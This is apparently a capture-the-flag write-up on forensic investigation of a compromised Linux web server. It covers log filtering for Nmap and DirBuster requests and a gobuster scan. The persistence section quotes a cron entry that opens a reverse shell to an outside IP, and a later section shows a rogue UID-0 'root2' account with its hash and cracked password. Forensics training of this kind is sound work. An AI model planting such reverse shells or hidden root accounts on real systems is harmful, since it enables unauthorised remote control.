


# Apache Log Analysis I
## Tasks
### How many different tools made requests to the server?
Looking at the access.log, tools that I can identify are
* curl
* DirBuster
### Name a path requested by Nmap.
```bash
fred@acmeweb:/var/log/apache2$ cat access.log  | grep "nmap"
```
Let's make it easier and filter only nmap searches
```bash
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "GET /nmaplowercheck1618912425 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
```
# Web Server Analysis
##  Tasks
## What page allows user to upload files?
Let's try our lucky cards first
* uploads.php
* upload.php
* files.php
Looks like none of this worked. Let's enumerate with gobuster.
```bash
/contact.php          (Status: 200) [Size: 2035]
```
Looks like we found it.

## What IP uploaded files to the server?
Let's head back the access.log and filter out by POST requests.
```bash
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST / HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
```
For this I used the hint, it said dirbuster already located most of the files so what I did was I only filter the one with response 200
```bash
192.168.56.24 - - [20/Apr/2021:09:55:34 +0000] "HEAD /resources/development/2021/docs/SECURITY.md HTTP/1.1" 200 233 "-" "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"
192.168.56.24 - - [20/Apr/2021:09:55:34 +0000] "GET /resources/development/2021/docs/SECURITY.md HTTP/1.1" 200 507 "-" "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"

```
Did some manual searching and found this file. Opening it up it shows the user who did this was 'fred'.

# Persistence Mechanism I
## Tasks
### What command and option did the attacker use to establish a backdoor?
Let's list out of all cronjobs first
```bash
fred@acmeweb:/var/log/apache2$ crontab -l
no crontab for fred
```
Fair enough let's see the /etc/crontab
```bash
fred@acmeweb:/var/log$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*  *    * * *   root2   sh -i >& /dev/tcp/192.168.56.206/1234 0>&1
```
Something looks familiar to you? That's right a reverse shell.

# User Accounts
## Tasks
### What is the password of the second root account?
Let's examine both /etc/passwd and /etc/shadow
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash

```
That's weird, /etc/passwd ** should not contain hashes **. 
Checking out /etc/shadow the root2 user isn't there.
Maybe we can crack his password using brute force?
I tried using hashcat but to no avail so I went and checked the hint.
It said that the it's a famous hash so I searched up and found it immediately.
```text
mrcake
```











